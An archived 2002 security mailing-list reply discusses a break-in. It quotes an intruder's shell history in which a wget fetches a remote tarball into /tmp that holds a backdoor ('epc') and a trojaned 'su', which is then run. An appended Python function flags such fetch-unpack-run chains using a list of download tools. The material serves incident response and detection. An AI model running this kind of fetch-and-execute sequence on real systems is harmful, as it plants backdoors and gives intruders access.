> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.

Maybe you should email this dude. He wrote the exploit (or so the exploit says) "su exploit by XP <xp@xtreme-power.com> Enjoy! " Other neat stuff if you do a strings on the two filenames.

>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>

The domain name resolves to http://www.djteckh.com/ maybe worth checking out.

> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
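One way to flag the same fetch, unpack and run sequence when reviewing shell histories from other hosts, as an added example that is not part of the original messages. The function names, the fetch-tool list and the directory list are assumptions, and only absolute `cd` targets are tracked.

```python
import posixpath
import re
import shlex

WORLD_WRITABLE = {"/tmp", "/var/tmp", "/dev/shm"}    # assumed list: any local user can write here
FETCHERS = {"wget", "curl", "lynx", "ftp", "fetch"}  # assumed list of download tools

def split_commands(line):
    """Split one history line on ';', '&&' and '||' into argv lists."""
    for part in re.split(r";|&&|\|\|", line):
        try:
            argv = shlex.split(part)
        except ValueError:            # unbalanced quote: fall back to a plain split
            argv = part.split()
        if argv:
            yield argv

def triage_history(lines):
    """Return (line_no, stage, detail) for fetch -> unpack -> run chains staged
    in a world-writable directory."""
    findings, cwd, fetched, unpacked = [], None, set(), False
    for no, line in enumerate(lines, 1):
        for argv in split_commands(line):
            cmd, args = posixpath.basename(argv[0]), argv[1:]
            operands = [a for a in args if not a.startswith("-")]
            if argv[0] == "cd":
                cwd = posixpath.normpath(operands[0]) if operands else None
                fetched, unpacked = set(), False     # new directory, new chain
                continue
            if cwd not in WORLD_WRITABLE:
                continue
            if argv[0].startswith("./"):
                if unpacked:                         # running something just unpacked
                    findings.append((no, "exec", argv[0]))
            elif cmd in FETCHERS and operands:
                # Assumption: the saved file is named after the URL's last path segment.
                fetched.update(posixpath.basename(o) for o in operands)
                findings.append((no, "fetch", operands[-1]))
            elif cmd == "tar" and args and "x" in args[0].lstrip("-"):
                for a in args[1:]:
                    if posixpath.basename(a) in fetched:
                        unpacked = True
                        findings.append((no, "unpack", a))
    return findings

# The history lines quoted in the post above.
SAMPLE = ["w", "cd /tmp",
          "wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz", "./epc"]

if __name__ == "__main__":
    for no, stage, detail in triage_history(SAMPLE):
        print(f"line {no}: {stage:6} {detail}")
```
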
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:32:49 PST